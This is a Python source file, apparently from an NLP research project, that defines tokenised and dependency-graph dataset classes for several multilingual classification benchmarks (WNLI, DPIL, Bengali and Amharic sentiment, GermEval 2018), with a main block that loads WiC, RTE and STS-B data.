def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(WNLI_TranslatedAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed WNLI_Translated Aux dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
if(self.is_sentence_1):
context = row['sentence1']
elif(self.is_sentence_2):
context = row['sentence2']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.WNLI_translated_labels).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class IITP_Product_ReviewsLMDataset(Dataset):
max_length = 179
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on IITP_Product_Reviews dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on IITP_Product_Reviews dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class IITP_Product_ReviewsAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(IITP_Product_ReviewsAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed IITP_Product_Reviews dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.IITP_product_reviews_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class MIDAS_DiscourseLMDataset(Dataset):
max_length = 321
def __init__(self, json_data, tokenizer):
self.data = json_data
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on MIDAS_DiscourseLMDataset dataset')
max_length = 0
for row_index, row in tqdm(enumerate(self.data), total=len(self.data)):
sentence_1 = row['Sentence']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on MIDAS_DiscourseLMDataset dataset: {max_length}')
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
row = self.data[idx]
sentence_1 = row['Sentence']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class MIDAS_DiscourseAuxDataset(GraphDataset):
def __init__(self, root, json_data, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data = json_data
self.DT_G = DT_G
super(MIDAS_DiscourseAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed MIDAS_Discourse dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(len(self.data))]
def process(self):
for row_index, row in tqdm(enumerate(self.data), total=len(self.data)):
label = row['Discourse Mode']
context = row['Sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.MIDAS_discourse_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class DPIL_Subtask_1LMDataset(Dataset):
max_length = 203
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on DPIL_Subtask_1 dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence_1']
sentence_2 = row['sentence_2']
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on DPIL_Subtask_1 dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence_1']
sentence_2 = row['sentence_2']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class DPIL_Subtask_1AuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(DPIL_Subtask_1AuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed DPIL_Subtask_1 Aux dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
if(self.is_sentence_1):
context = row['sentence_1']
elif(self.is_sentence_2):
context = row['sentence_2']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.DPIL_subtask_1_labels).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class DPIL_Subtask_2LMDataset(Dataset):
max_length = 210
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on DPIL_Subtask_2 dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence_1']
sentence_2 = row['sentence_2']
input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on DPIL_Subtask_2 dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence_1']
sentence_2 = row['sentence_2']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
return input_ids, token_type_ids, attention_mask
class DPIL_Subtask_2AuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
self.data_frame = data_frame
self.DT_G = DT_G
assert(sum([is_sentence_1, is_sentence_2]) == 1)
self.is_sentence_1 = is_sentence_1
self.is_sentence_2 = is_sentence_2
super(DPIL_Subtask_2AuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed DPIL_Subtask_2 Aux dataset from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
if(self.is_sentence_1):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
elif(self.is_sentence_2):
return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
if(self.is_sentence_1):
context = row['sentence_1']
elif(self.is_sentence_2):
context = row['sentence_2']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.DPIL_subtask_2_labels).to(config.device)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
if(self.is_sentence_1):
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
elif(self.is_sentence_2):
torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
if(self.is_sentence_1):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
elif(self.is_sentence_2):
data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
return data
class KhondokerIslam_BengaliLMDataset(Dataset):
max_length = 218
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on KhondokerIslam_Bengali dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['Data']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on KhondokerIslam_Bengali dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['Data']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class KhondokerIslam_BengaliAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(KhondokerIslam_BengaliAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed KhondokerIslam_Bengali from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['Sentiment']
context = row['Data']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.KhondokerIslam_bengali_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Rezacsedu_SentimentLMDataset(Dataset):
max_length = 260
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on Rezacsedu_Sentiment dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['text']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on Rezacsedu_Sentiment dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['text']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class Rezacsedu_SentimentAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Rezacsedu_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Rezacsedu_Sentiment from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['text']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.rezacsedu_sentiment_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class BEmoCLMDataset(Dataset):
max_length = 460
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on BEmoCLMDataset dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['cleaned']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on BEmoCLMDataset dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['cleaned']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class BEmoCLMDatasetAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(BEmoCLMDatasetAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed BEmoCL from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['classes']
context = row['cleaned']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.BEmoC_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Seid_Amharic_SentimentLMDataset(Dataset):
max_length = 95
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on Seid_Amharic_Sentiment dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on Seid_Amharic_Sentiment dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class Seid_Amharic_SentimentAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Seid_Amharic_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Seid_Amharic_Sentiment from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.Seid_Amharic_Sentiment_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Seid_Amharic_Cleaned_SentimentAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Seid_Amharic_Cleaned_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Seid_Amharic_Cleaned_Sentiment from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.Seid_Amharic_Sentiment_cleaned_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Amharic_EvalAuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Amharic_EvalAuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Amharic_Eval from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.Amharic_eval_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Germeval2018LMDataset(Dataset):
max_length = 228
def __init__(self, data_frame, tokenizer):
self.data_frame = data_frame
self.tokenizer = tokenizer
assert(self.max_length <= self.tokenizer.model_max_length)
def _compute_max_length(self):
print(f'Computing max length (sub-word + special tokens) on Germeval2018 dataset')
max_length = 0
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
sentence_1 = row['sentence']
input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
max_length = max(max_length, len(input_ids))
max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
print(f'Max length (sub-word + special tokens) on Germeval2018 dataset: {max_length}')
def __len__(self):
return self.data_frame.shape[0]
def __getitem__(self, idx):
row = self.data_frame.iloc[idx, :]
sentence_1 = row['sentence']
input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
return input_ids, token_type_ids, attention_mask
class Germeval2018_Subtask_1AuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Germeval2018_Subtask_1AuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Germeval_Subtask_1 from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['subtask_1_label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.germeval2018_subtask_1_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
class Germeval2018_Subtask_2AuxDataset(GraphDataset):
def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
assert(is_sentence_1 == True and is_sentence_2 == False)
self.data_frame = data_frame
self.DT_G = DT_G
super(Germeval2018_Subtask_2AuxDataset, self).__init__(root, transform, pre_transform)
print(f'Loaded processed Germeval_Subtask_2 from {root}')
@property
def raw_file_names(self):
return []
@property
def processed_file_names(self):
return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
def process(self):
for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
label = row['subtask_2_label']
context = row['sentence']
edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
data = Data()
data['edge_index'] = edge_index.to(config.device)
data['edge_attr'] = edge_attr.to(config.device)
data['y'] = utils.get_label_embedding(label, config.germeval2018_subtask_2_labels)
data['sentence'] = context
data.num_nodes = len(context.split())
if(self.pre_filter is not None and not self.pre_filter(data)):
continue
if(self.pre_transform is not None):
data = self.pre_transform(data)
torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
def len(self):
return len(self.processed_file_names)
def get(self, idx):
data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
return data
if __name__ == '__main__':
DT_G = utils.load_DT()
if(config.experiment == 'WiC'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
WiC_train_data_frame = utils.get_WiC_data_frame(config.WiC_train_data_path, config.WiC_train_gold_path)
train_LM_dataset = WiCLMDataset(WiC_train_data_frame, tokenizer)
train_dataset_aux_1 = WiCAuxDataset(root='../data/WiC/train/', data_frame=WiC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = WiCAuxDataset(root='../data/WiC/train/', data_frame=WiC_train_data_frame, DT_G=DT_G, is_sentence_2=True)
WiC_dev_data_frame = utils.get_WiC_data_frame(config.WiC_dev_data_path, config.WiC_dev_gold_path)
dev_LM_dataset = WiCLMDataset(WiC_dev_data_frame, tokenizer)
dev_dataset_aux_1 = WiCAuxDataset(root='../data/WiC/dev/', data_frame=WiC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = WiCAuxDataset(root='../data/WiC/dev/', data_frame=WiC_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'RTE'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
RTE_train_data_frame = utils.get_RTE_data_frame(config.RTE_train_data_path)
train_LM_dataset = RTELMDataset(RTE_train_data_frame, tokenizer)
train_dataset_aux_1 = RTEAuxDataset(root='../data/glue_data/RTE/train/', data_frame=RTE_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = RTEAuxDataset(root='../data/glue_data/RTE/train/', data_frame=RTE_train_data_frame, DT_G=DT_G, is_sentence_2=True)
RTE_dev_data_frame = utils.get_RTE_data_frame(config.RTE_dev_data_path)
dev_LM_dataset = RTELMDataset(RTE_dev_data_frame, tokenizer)
dev_dataset_aux_1 = RTEAuxDataset(root='../data/glue_data/RTE/dev/', data_frame=RTE_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = RTEAuxDataset(root='../data/glue_data/RTE/dev/', data_frame=RTE_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'STS_B'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
STS_B_train_data_frame = utils.get_STS_B_data_frame(config.STS_B_train_data_path)
train_LM_dataset = STS_BLMDataset(STS_B_train_data_frame, tokenizer)
train_dataset_aux_1 = STS_BAuxDataset('../data/glue_data/STS-B/train/', data_frame=STS_B_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = STS_BAuxDataset('../data/glue_data/STS-B/train/', data_frame=STS_B_train_data_frame, DT_G=DT_G, is_sentence_2=True)
STS_B_dev_data_frame = utils.get_STS_B_data_frame(config.STS_B_dev_data_path)
dev_LM_dataset = STS_BLMDataset(STS_B_dev_data_frame, tokenizer)
